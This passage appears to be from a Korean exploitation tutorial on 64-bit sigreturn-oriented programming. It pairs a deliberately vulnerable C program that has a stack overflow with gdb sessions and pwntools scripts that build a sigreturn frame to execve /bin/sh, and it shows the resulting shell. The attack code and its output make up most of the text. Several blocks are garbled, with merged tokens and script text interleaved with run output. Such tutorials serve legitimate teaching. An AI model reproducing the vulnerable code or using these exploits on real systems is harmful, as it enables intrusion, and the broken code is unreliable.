...
| Code Block | ||||
|---|---|---|---|---|
| ||||
//gcc -fno-stack-protector -o srop64 srop64.c -ldl
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>
void vuln(){
char buf[50];
void (*printf_addr)() = dlsym(RTLD_NEXT, "printf");
printf("Printf() address : %p\n",printf_addr);
read(0, buf, 256512);
}
void main(){
seteuid(getuid());
write(1,"Hello SROP\n",10);
vuln();
} |
...
| Code Block | ||
|---|---|---|
| ||
lazenca0x0@ubuntu:~/Exploit/SROP$ gdb -q ./srop64 Reading symbols from ./srop64...(no debugging symbols found)...done. gdb-peda$ disassemble vuln Dump of assembler code for function vuln: 0x0000000000400756 <+0>: push rbp 0x0000000000400757 <+1>: mov rbp,rsp 0x000000000040075a <+4>: sub rsp,0x40 0x000000000040075e <+8>: mov esi,0x400864 0x0000000000400763 <+13>: mov rdi,0xffffffffffffffff 0x000000000040076a <+20>: call 0x400630 <dlsym@plt> 0x000000000040076f <+25>: mov QWORD PTR [rbp-0x8],rax 0x0000000000400773 <+29>: mov rax,QWORD PTR [rbp-0x8] 0x0000000000400777 <+33>: mov rsi,rax 0x000000000040077a <+36>: mov edi,0x40086b 0x000000000040077f <+41>: mov eax,0x0 0x0000000000400784 <+46>: call 0x400600 <printf@plt> 0x0000000000400789 <+51>: lea rax,[rbp-0x40] 0x000000000040078d <+55>: mov edx,0x1000x200 0x0000000000400792 <+60>: mov rsi,rax 0x0000000000400795 <+63>: mov edi,0x0 0x000000000040079a <+68>: call 0x400610 <read@plt> 0x000000000040079f <+73>: nop 0x00000000004007a0 <+74>: leave 0x00000000004007a1 <+75>: ret End of assembler dump. gdb-peda$ b *0x0000000000400756 Breakpoint 1 at 0x400756 gdb-peda$ b *0x000000000040079a Breakpoint 2 at 0x40079a gdb-peda$ |
...
| Code Block | ||
|---|---|---|
| ||
gdb-peda$ r Starting program: /home/lazenca0x0/Exploit/SROP/srop64 Hello SROP Breakpoint 1, 0x0000000000400756 in vuln () gdb-peda$ i r rsp rsp 0x7fffffffe498 0x7fffffffe498 gdb-peda$ x/gx 0x7fffffffe498 0x7fffffffe498: 0x00000000004007d0 gdb-peda$ x/i 0x00000000004007d0 0x4007d0 <main+46>: nop gdb-peda$ c Continuing. Printf() address : 0x7ffff785e800 Breakpoint 2, 0x000000000040079a in vuln () gdb-peda$ i r rsi rsi 0x7fffffffe450 0x7fffffffe450 gdb-peda$ p/d 0x7fffffffe498 - 0x7fffffffe450 $1 = 72 gdb-peda$ |
...
| Code Block | ||
|---|---|---|
| ||
lazenca0x0@ubuntu:~/Exploit/SROP$ readelf --notes ./srop64 Displaying notes found at file offset 0x00000254 with length 0x00000020: Owner Data size Description GNU 0x00000010 NT_GNU_ABI_TAG (ABI version tag) OS: Linux, ABI: 2.6.32 Displaying notes found at file offset 0x00000274 with length 0x00000024: Owner Data size Description GNU 0x00000014 NT_GNU_BUILD_ID (unique build ID bitstring) Build ID: e3f2a207a17917c441c725ef3e150798d250b6ce 8bc6a6d7b9f016893a86290ec9ed1b41769e9cfc lazenca0x0@ubuntu:~/Exploit/SROP$ gdb -q ./srop64 gdb-peda$ b *0x0000000000400756 Breakpoint 1 at 0x400756 gdb-peda$ r Starting program: /home/lazenca0x0/Exploit/SROP/srop64 Hello SROP Breakpoint 1, 0x0000000000400756 in vuln () gdb-peda$ vmmap Start End Perm Name ... 0x00007ffffffde000 0x00007ffffffff000 rw-p [stack] 0xffffffffff600000 0xffffffffff601000 r-xp [vsyscall] gdb-peda$ x/3i 0xffffffffff600000 0xffffffffff600000: mov rax,0x60 0xffffffffff600007: syscall 0xffffffffff600009: ret gdb-peda$ |
...
| Code Block | ||||
|---|---|---|---|---|
| ||||
from pwn import *
binary = ELF('./srop64')
p = process(binary.path)
sleep(20)
p.recvuntil('Printf() address : ')
stackAddr = p.recvuntil('\n')
stackAddr = int(stackAddr,16)
libcBase = stackAddr - 0x55800
sigreturnsyscall = libcBase + 0x5e96c00xbc375
#syscall = 0xffffffffff600007
binsh = libcBase + 0x18cd57
syscallpoprax = libcBase + 0xbc3750x33544
#syscall = 0xffffffffff600007
poprax = libcBase + 0x33544
printprint 'The base address of Libc : ' + hex(libcBase)
print hex(sigreturn)
print'Address of syscall gadget : ' + hex(binshsyscall)
print hex(syscall'Address of string "/bin/sh" : ' + hex(binsh)
print 'Address of poprax gadget : ' + hex(poprax)
exploit = ''
exploit += "\x90" * 72
exploit += p64(poprax)
exploit += p64(0xf)
exploit += p64(syscall)
#ucontext
exploit += p64(0x0) * 5
#sigcontext
exploit += p64(0x0) #R8
exploit += p64(0x0) #R9
exploit += p64(0x0) #R10
exploit += p64(0x0) #R11
exploit += p64(0x0) #R12
exploit += p64(0x0) #R13
exploit += p64(0x0) #R14
exploit += p64(0x0) #R15
exploit += p64(binsh) #RDI
exploit += p64(0x0) #RSI
exploit += p64(0x0) #RBP
exploit += p64(0x0) #RBX
exploit += p64(0x0) #RDX
exploit += p64(constants.SYS_execve0x3b) #RAX
exploit += p64(0x0) #RCX
exploit += p64(syscall) #RSP
exploit += p64(syscall) #RIP
exploit += p64(0x0) #eflags
exploit += p64(0x33) #cs
exploit += p64(0x0) #gs
exploit += p64(0x0) #fs
exploit += p64(0x2b) #ss
p.send(exploit)
p.interactive() |
- pwntools를 이용해 조금더 편하게 코드를 작성할 수 있습니다.
| Code Block | |||
|---|---|---|---|
| |||
lazenca0x0@ubuntu:~/Exploit$ python srop64.py | from pwn import * binary = ELF('. [*] '/home/lazenca0x0/Exploit/SROP/srop64') p = process(binary.path) #sleep(20) p.recvuntil('Printf() address Arch: ') stackAddr = p.recvuntil('\n') stackAddr = int(stackAddr,16) libcBase = stackAddr - 0x55800 binsh = libcBase + 0x18cd57 syscall = libcBase + 0xbc375 poprax = libcBase + 0x33544 print hex(libcBase) print hex(binsh) print hex(syscall) print hex(poprax) exploit = '' exploit += "\x90" * 72 exploit += p64(poprax) exploit += p64(0xf) exploit += p64(syscall) frame = SigreturnFrame(arch="amd64") frame.rax = 0x3b frame.rdi = binsh frame.rsp = syscall frame.rip = syscall exploit += str(frame) p.send(exploit) p.interactive() amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) [+] Starting local process '/home/lazenca0x0/Exploit/SROP/srop64': pid 17771 The base address of Libc : 0x7f9cb1ae2000 Address of syscall gadget : 0x7f9cb1b9d945 Address of string "/bin/sh" : 0x7f9cb1c6e58b Address of poprax gadget : 0x7f9cb1b1c718 [*] Switching to interactive mode $ id uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) $ |
- pwntools를 이용해 조금더 편하게 코드를 작성할 수 있습니다.
| Code Block | ||||
|---|---|---|---|---|
| ||||
from pwn import *
context.arch = "amd64"
binary = ELF('./srop64')
p = process(binary.path)
p.recvuntil('Printf() address : ')
stackAddr = p.recvuntil('\n')
stackAddr = int(stackAddr,16)
libcBase = stackAddr - 0x55800
syscall = libcBase + 0xbc375
binsh = libcBase + 0x18cd57
poprax = libcBase + 0x33544
print 'The base address of Libc : ' + hex(libcBase)
print 'Address of syscall gadget : ' + hex(syscall)
print 'Address of string "/bin/sh" : ' + hex(binsh)
print 'Address of poprax gadget : ' + hex(poprax)
exploit = ''
exploit += "\x90" * 72
exploit += p64(poprax)
exploit += p64(0xf)
exploit += p64(syscall)
frame = SigreturnFrame(arch="amd64")
frame.rax = constants.SYS_execve
frame.rdi = binsh
frame.rsp = syscall
frame.rip = syscall
exploit += str(frame)
p.send(exploit)
p.interactive() |
| Code Block | ||
|---|---|---|
| ||
lazenca0x0@ubuntu:~/Exploit/SROP$ python srop64-pwn.py
[*] '/home/lazenca0x0/Exploit/srop64'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Starting local process '/home/lazenca0x0/Exploit/SROP/srop64': pid 17757
The base address of Libc : 0x7f36d0719000
Address of syscall gadget : 0x7f36d07d4945
Address of string "/bin/sh" : 0x7f36d08a558b
Address of poprax gadget : 0x7f36d0753718
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$ |
Related site
- http://egloos.zum.com/studyfoss/v/5182475
- http://docs.pwntools.com/en/stable/rop/srop.html
- http://www.freebuf.com/articles/network/87447.html
- http://blog.leanote.com/post/3191220142@qq.com/SROP
- http://blackbunny.io/x64-sigreturn-oriented-programming/
- https://en.wikipedia.org/wiki/Sigreturn-oriented_programming
- https://books.google.co.jp/books?id=h0lltXyJ8aIC&dq=setup_frame&hl=ko&source=gbs_navlinks_s
- https://thisissecurity.stormshield.com/2015/01/03/playing-with-signals-an-overview-on-sigreturn-oriented-programming/
...